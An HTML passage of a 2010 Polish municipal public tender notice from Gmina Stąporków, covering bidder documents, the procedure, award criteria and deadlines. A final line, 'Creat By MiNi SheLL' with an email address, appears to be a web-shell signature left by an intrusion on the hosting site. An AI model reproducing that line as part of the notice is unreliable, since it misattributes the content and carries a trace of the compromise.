<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie ze zmianami i określonymi warunkami tych zmian w Istotnych postanowieniach umownych - załacznik nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.staporkow,pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Stąporków ul. Piłsudskiego 132A 26-220 Stąporków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 09:30, miejsce: Gmina Stąporków ( sekretariat, pok. nr 20 ) ul. Piłsudskiego 132A 26-220 Stąporków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com